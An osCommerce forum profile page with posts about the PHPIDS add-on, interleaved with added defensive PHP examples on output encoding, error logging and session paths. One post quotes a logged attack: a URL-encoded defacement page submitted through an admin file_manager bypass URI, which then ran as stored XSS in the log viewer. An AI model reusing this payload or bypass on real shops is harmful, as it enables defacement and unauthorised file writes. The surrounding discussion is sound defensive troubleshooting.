osCommerce

The e-commerce.

VAZ2121

Members
About VAZ2121

  • Birthday 08/02/1964

Profile Information

  • Real Name
    Stig F.
  • Gender
    Male
  • Location
    Denmark
  1. There is a hack to the PHPIDS. A hacker has written a script directly to hit this add-on. Here is the story...

     The PHPIDS sends me a mail about any attempt to hack the site. Today I received this:

     The following attack has been detected by PHPIDS
     IP: 78.177.107.5
     Date: 2011-01-15T21:29:58+00:00
     Impact: 138
     Affected tags: xss csrf id rfe lfi sqli
     Affected parameters: REQUEST.file_contents=%3CHTML%3E+%0D%0A%3CHEAD%3E+%0D%0A+++%3CTITLE%3EHacked+By+SaMuRa%21%3C%2FTITLE%3E+%0D%0A+%3Ccenter%3E%3Cimg+src%3Dhttp%3A%2F%2Fwww.turkhackteam.net%2Fimages%2Fthtson.jpg%3E+%0D%0A+%3Cstyle%3E+%0D%0A%23legend%7Bwidth%3A+100%25%3B+position%3A+fixed%3B+background-color%3A222%3B+bottom%3A+0%3B+font-size%3A+13px%3B+left%3A+0%3B+border-top%3A%0D%0A1px+solid+white%3B+height%3A+20px%3B+padding%3A+5px%3Bcolor%3A%23gold%3Bfont-family%3Aarial%3B%7D%0D%0Aa%7Bcolor%3Awgite%3Btext-decoration%3Anone%3B%7D%0D%0Aa%3Ahover%7Bcolor%3A%23ccc%3B%7D%0D%0A%3C%2Fstyle%3E+%0D%0A+++%3Cdiv+id%3D%27legend%27%3E%3Ccenter%3E%3Cb%3ESaMuRa%21+-+Egoist+Group+-+TurkHackTeam.OrG%2FNet%3C%2Fb%3E%3C%2Fcenter%3E%3C%2Fdiv%3E+%0D%0A%3CBODY+TEXT%3D%22%239C9C9C%22+BGCOLOR%3D%22%23000000%22+LINK%3D%22%238B51FF%22+ALINK%3D%22%23FFF8FF%22%0D%0A+%3Cbody+bgcolor%3D%22%23000000%22%3E+%0D%0A++++++%3C%2Fspan%3E%3Cfont+color%3D%22White%22+size%3D%225%22%3E+%3C%2Fspan%3E%3Cfont+%0D%0A%3E%3CFONT+FACE%3D%22tahoma%22+color%3D%22%23999999%22%3E++++%0D%0A%3Ccenter%3E%3Cbr%3E%3C%2Fspan%3E%3Cspan+style%3D%22font-weight%3Abold%3B+text-shadow%3Awhite+0px+0px+8px%3B+color%3Awhite%22%3E%3Cfont+color%3Dred%3EHacked+By+SaMuRa%21+-+Black-Box+-+Dejavue+-+CaLLouS%3Cbr%3E%3C%2Ffont%3E%3C%2Fspan+%0D%0A%3E%0D%0A%3CP%3E%3CTABLE+BORDER%3D0+WIDTH%3D%22100%25%22+HEIGHT%3D%22100%25%22%3E+%0D%0A+%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%22red%22+size%3D%222%22%3E%3Cb%3E%22+Biz+eskimeyenlerdeniz%2C+Hayatta+oldugumuz+surece+her+donem+bizim+donemimiz%21+%22%0D%0A+%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cb%3E%3Cb%3E%3Cb%3E+%0D%0A%3Cbr%3E%0D%0A%3Cbr%3E%0D%0A%3Cbr%3E%0D%0A%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%22white%22+size%3D%222%22%3E%3Cb%3E%3C+www.facebook.com%2Fhackingplatform+%3E%0D%0A%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%22white%22+size%3D%222%22%3E%3Cb%3E-------------------------------------------+%0D%0A+%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cb%3E%3Cb%3E%3Cb%3E+%0D%0A++++++++%3C%2Fb%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Fp%3E+%0D%0A%3Cbr%3E%3C%2Fspan%3E%3Cfont+color%3D%22white%22+size%3D%222%22%3C%2Ffont%3E%3Cbr%3E+, POST.file_contents=%3CHTML%3E+%0D%0A%3CHEAD%3E+%0D%0A+++%3CTITLE%3EHacked+By+SaMuRa%21%3C%2FTITLE%3E+%0D%0A+%3Ccenter%3E%3Cimg+src%3Dhttp%3A%2F%2Fwww.turkhackteam.net%2Fimages%2Fthtson.jpg%3E+%0D%0A+%3Cstyle%3E+%0D%0A%23legend%7Bwidth%3A+100%25%3B+position%3A+fixed%3B+background-color%3A222%3B+bottom%3A+0%3B+font-size%3A+13px%3B+left%3A+0%3B+border-top%3A%0D%0A1px+solid+white%3B+height%3A+20px%3B+padding%3A+5px%3Bcolor%3A%23gold%3Bfont-family%3Aarial%3B%7D%0D%0Aa%7Bcolor%3Awgite%3Btext-decoration%3Anone%3B%7D%0D%0Aa%3Ahover%7Bcolor%3A%23ccc%3B%7D%0D%0A%3C%2Fstyle%3E+%0D%0A+++%3Cdiv+id%3D%5C%27legend%5C%27%3E%3Ccenter%3E%3Cb%3ESaMuRa%21+-+Egoist+Group+-+TurkHackTeam.OrG%2FNet%3C%2Fb%3E%3C%2Fcenter%3E%3C%2Fdiv%3E+%0D%0A%3CBODY+TEXT%3D%5C%22%239C9C9C%5C%22+BGCOLOR%3D%5C%22%23000000%5C%22+LINK%3D%5C%22%238B51FF%5C%22+ALINK%3D%5C%22%23FFF8FF%5C%22%0D%0A+%3Cbody+bgcolor%3D%5C%22%23000000%5C%22%3E+%0D%0A++++++%3C%2Fspan%3E%3Cfont+color%3D%5C%22White%5C%22+size%3D%5C%225%5C%22%3E+%3C%2Fspan%3E%3Cfont+%0D%0A%3E%3CFONT+FACE%3D%5C%22tahoma%5C%22+color%3D%5C%22%23999999%5C%22%3E++++%0D%0A%3Ccenter%3E%3Cbr%3E%3C%2Fspan%3E%3Cspan+style%3D%5C%22font-weight%3Abold%3B+text-shadow%3Awhite+0px+0px+8px%3B+color%3Awhite%5C%22%3E%3Cfont+color%3Dred%3EHacked+By+SaMuRa%21+-+Black-Box+-+Dejavue+-+CaLLouS%3Cbr%3E%3C%2Ffont%3E%3C%2Fspan+%0D%0A%3E%0D%0A%3CP%3E%3CTABLE+BORDER%3D0+WIDTH%3D%5C%22100%25%5C%22+HEIGHT%3D%5C%22100%25%5C%22%3E+%0D%0A+%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%5C%22red%5C%22+size%3D%5C%222%5C%22%3E%3Cb%3E%5C%22+Biz+eskimeyenlerdeniz%2C+Hayatta+oldugumuz+surece+her+donem+bizim+donemimiz%21+%5C%22%0D%0A+%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cb%3E%3Cb%3E%3Cb%3E+%0D%0A%3Cbr%3E%0D%0A%3Cbr%3E%0D%0A%3Cbr%3E%0D%0A%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%5C%22white%5C%22+size%3D%5C%222%5C%22%3E%3Cb%3E%3C+www.facebook.com%2Fhackingplatform+%3E%0D%0A%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%5C%22white%5C%22+size%3D%5C%222%5C%22%3E%3Cb%3E-------------------------------------------+%0D%0A+%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cb%3E%3Cb%3E%3Cb%3E+%0D%0A++++++++%3C%2Fb%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Fp%3E+%0D%0A%3Cbr%3E%3C%2Fspan%3E%3Cfont+color%3D%5C%22white%5C%22+size%3D%5C%222%5C%22%3C%2Ffont%3E%3Cbr%3E+
     Request URI: %2Fproduct_info.php%2Fadmin%2Ffile_manager.php%2Flogin.php%3Faction%3Dsave

     I receive a lot of those mails. This is however a bit different, so I decided to take a look at it. I started the Admin and went to see the PHPIDS Log. Now something happened. The code that this hacker wrote started to execute in my Admin!!! So there is no execution filter in viewing the Log. The hacker has used this exploit in the PHPIDS!!!!
     I have checked all my files, nothing has changed. This was a mild hack, it only displayed a message in my Admin. Regards, Stig
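The behaviour Stig describes (a payload stored by the IDS being rendered in the admin log viewer and interpreted by the browser) is a stored cross-site scripting problem in the viewer, and the fix belongs at output time: the log should keep the raw evidence, and every field must be HTML-encoded when it is written into the page. The following is an added example written for this thread; it is not code from the add-on or from the original post. The function names, the field names and the sample entry are all constructed for illustration.

```php
<?php
// Added example (not part of the original post or the PHPIDS add-on):
// render PHPIDS log entries into HTML with output encoding, so that a stored
// payload is shown as text instead of being interpreted by the admin's browser.

/**
 * Encode one value for placement in HTML element or attribute context.
 * ENT_QUOTES covers both quote styles; UTF-8 is assumed for the log data.
 */
function phpids_html_encode($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

/**
 * Render a single log row as an HTML table row. Every field, including the
 * attacker-controlled ones (request URI and parameters), is encoded.
 * Field names are hypothetical; map them to the add-on's own columns.
 */
function phpids_render_log_row(array $row)
{
    $fields = array('ip', 'date', 'impact', 'tags', 'request_uri', 'parameters');
    $cells  = array();
    foreach ($fields as $field) {
        $value   = isset($row[$field]) ? $row[$field] : '';
        $cells[] = '<td>' . phpids_html_encode($value) . '</td>';
    }
    return '<tr>' . implode('', $cells) . '</tr>';
}

// Constructed sample entry. The IP is a documentation address and the
// markup in 'parameters' is a harmless stand-in for stored attack content.
$sample = array(
    'ip'          => '203.0.113.10',
    'date'        => '2011-01-15T21:29:58+00:00',
    'impact'      => 138,
    'tags'        => 'xss csrf id rfe lfi sqli',
    'request_uri' => '/product_info.php/admin/file_manager.php/login.php?action=save',
    'parameters'  => 'POST.file_contents=<script>alert(1)</script>',
);

echo phpids_render_log_row($sample), "\n";
// The cell now contains the literal text &lt;script&gt;alert(1)&lt;/script&gt;,
// which the browser displays as "<script>alert(1)</script>" and does not run.
```

Encoding at output rather than at storage keeps the log useful as evidence (the exact bytes the attacker sent are preserved) while making the viewer safe regardless of which page displays the data. The same treatment applies to the notification mail if it is ever sent as HTML.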
  2. reading in "Security"

  3. OK, thanks, I will remove this line. (In your next upload to the "contributions", remove the line in the 3 files - so others don't get confused - like me :-) ) I have set the full path! It works fine. Everything works 100% now. Thank you very much for your help. It's a great add-on (during the 4 days I have tried it, I have already captured 2 intruders - and banned them). Thanks (again), you are doing a great job with this add-on.
  4. My cache was turned off. I created the tmp directory (named it tmp and set permissions to 777), wrote the full path, and turned cache ON. Now I can see files begin to appear in my tmp directory = it works. But I still get the warnings! The problem is this command: ini_set('display_errors', '1'); I have not found this command in any other PHP files. Are you absolutely sure you have this in your "normal" installation? It looks very much like something for debugging.
  5. The problem is solved. The add-on includes 3 files (admin/banned_ip.php, admin/phpids_installer.php and admin/phpids_report.php). All 3 files have some error reporting turned on. Take a look at this:

     <?php
     /*
       $Id: phpids_installer.php
       PHP Intrusion Detection System for osCommerce
       PHPIDS for osCommerce 1.6
       Date: June 13, 2010
       Created by celextel - www.celextel.com
       Module to include PHPIDS into osCommerce to log and prevent intrusions

       osCommerce, Open Source E-Commerce Solutions
       http://www.oscommerce.com

       Copyright © 2010 osCommerce
       Released under the GNU General Public License
     */
     error_reporting(E_ALL);
     ini_set('display_errors', '1');

     require_once('includes/application_top.php');

     // create phpids table if it does not exist
     mysql_query("DESC ". TABLE_PHPIDS .""); 
     if (mysql_errno()) {
       mysql_query("CREATE TABLE IF NOT EXISTS ". TABLE_PHPIDS ." (
       .....

     The first 2 commands are error_reporting(E_ALL); ini_set('display_errors', '1'); I removed those 2 commands from the 2 files in my admin/ and now there are no more warnings. As you also can see, the following command mysql_query("DESC ". TABLE_PHPIDS .""); will generate an error (if the table is not present in the db), hence giving me error/warning messages when executing. Are any of the 2 commands needed? Or may I just delete them both?
  6. 1. I did run the admin/phpids_installer.php. That file also gave the same warnings, but it also gave me the success messages that the tables were created.
     2. I have just re-checked the following: the banned IP I tried to insert does get inserted (in spite of all the warnings). I just had to reload the page to see the results! It works OK. After all, it's just "warnings"; the code seems to work as it should.
     3. I will later check the 2 MySQL tables, to see if they are not exactly created as the phpids_installer.php told them to be. So now it's not so critical. It would be nice to see my admin running without warnings.
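Two separate things are going on in posts 5 and 6 above: display_errors=1 is printing diagnostics (including server paths) into the admin page, and the installer detects a missing table by running DESC and waiting for it to fail, which is what produces the warning in the first place. The following added example, written for this thread and not taken from the add-on, shows the defensive alternative for both: report everything to the error log instead of the page, and test for the table with a query that returns zero rows rather than an error. It assumes a mysqli connection (the add-on's own code uses the older mysql_* functions) and reuses the TABLE_PHPIDS constant named in the thread; connection parameters are placeholders.

```php
<?php
// Added example (not the add-on's own installer code): production-safe error
// settings plus a table-existence check that does not rely on a failed query.
// Assumes a mysqli connection and the constant TABLE_PHPIDS from the add-on.

// Keep full reporting, but route it to the error log. display_errors=1 in an
// admin page prints file paths and line numbers to whoever views the page,
// as the warnings quoted earlier in this thread show.
error_reporting(E_ALL);
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/**
 * Return true when $table exists in the current database.
 * SHOW TABLES LIKE yields zero rows for a missing table instead of raising
 * an error, so no warning is generated either way. LIKE wildcards (% and _)
 * in the table name are escaped so that "phpids_log" cannot match "phpidsXlog".
 */
function phpids_table_exists(mysqli $db, $table)
{
    $pattern = $db->real_escape_string(addcslashes($table, '%_'));
    $result  = $db->query("SHOW TABLES LIKE '" . $pattern . "'");
    if ($result === false) {
        error_log('phpids: table check failed: ' . $db->error);
        return false;
    }
    $exists = $result->num_rows > 0;
    $result->free();
    return $exists;
}

// Usage (placeholder credentials; the real values come from the shop's config):
// $db = new mysqli('localhost', 'DB_USER', 'DB_PASSWORD', 'DB_NAME');
// if (!$db->connect_error && !phpids_table_exists($db, TABLE_PHPIDS)) {
//     // run the add-on's CREATE TABLE statement here
// }
```

With this arrangement the two lines Stig asked about can stay in a form that still records problems (the error log) without printing them to the admin screen, and the "DESC then check mysql_errno()" idiom is no longer needed to decide whether to create the table.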
  7. Hi, I have just installed this add-on. In Admin I select Tools, Banned IP. Then this is written on top of the page:

     Warning: session_save_path() [function.session-save-path]: open_basedir restriction in effect. File(/tmp) is not within the allowed path(s): (/customers/mysite.com/mysite.com:/var/www/diagnostics:/usr/share/php) in /customers/mysite.com/mysite.com/httpd.www/admin/includes/functions/sessions.php on line 165

     Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /customers/mysite.com/mysite.com/httpd.www/admin/includes/functions/sessions.php:165) in /customers/mysite.com/mysite.com/httpd.www/admin/includes/functions/sessions.php on line 102

     I am also not able to Insert (Ban) an IP (a lot of warnings appear). The same warnings appear when I select the menu PHPIDS Log. This menu does work OK though. Any ideas?
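The two warnings in post 7 are one problem: session_save_path('/tmp') is refused because /tmp lies outside open_basedir, and the warning text itself is output, so session_start() can no longer send headers. Post 4 resolves it by pointing the session path at a directory inside the allowed list. The following is an added example (not from the thread or the add-on) of checking a candidate directory against open_basedir before handing it to session_save_path(), so the refusal never happens and nothing is printed before headers go out. The function name and the sample path are assumptions; substitute the full path from your own hosting account.

```php
<?php
// Added example (not the add-on's code): verify that a session save path is
// inside PHP's open_basedir list before calling session_save_path().
// Must run before any output, otherwise session_start() will still complain
// about headers already sent.

/**
 * Return true when $path is inside one of the open_basedir entries, or when
 * no open_basedir restriction is set. realpath() resolves symlinks and '..'
 * so that the comparison is made on the real location.
 * $open_basedir may be supplied explicitly (for testing); otherwise ini_get()
 * is consulted.
 */
function session_path_allowed($path, $open_basedir = null)
{
    if ($open_basedir === null) {
        $open_basedir = ini_get('open_basedir');
    }
    if ($open_basedir === false || $open_basedir === '') {
        return true; // no restriction in effect
    }
    $real = realpath($path);
    if ($real === false) {
        return false; // directory does not exist
    }
    // open_basedir entries are separated by ':' on Unix (PATH_SEPARATOR),
    // matching the "(/a:/b:/c)" list shown in the warning above.
    foreach (explode(PATH_SEPARATOR, $open_basedir) as $base) {
        $base = rtrim($base, '/');
        if ($real === $base || strpos($real . '/', $base . '/') === 0) {
            return true; // $real is $base itself or lives beneath it
        }
    }
    return false;
}

// Usage. The path is a placeholder modelled on the hosting layout quoted in
// the thread; use the real full path of the tmp directory you created.
$candidate = '/customers/mysite.com/mysite.com/httpd.www/tmp';
if (session_path_allowed($candidate) && is_writable($candidate)) {
    session_save_path($candidate);
} else {
    // Log instead of echoing: printing here would trigger the
    // "headers already sent" warning seen in post 7.
    error_log('session save path not usable: ' . $candidate);
}
```

One caveat for the directory itself: it only needs to be writable by the user the web server runs as, so ownership by that user with mode 0700 is enough; world-writable (777) permissions let any other account on a shared host read or replace the session files stored there.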
  8. Sorry wrong post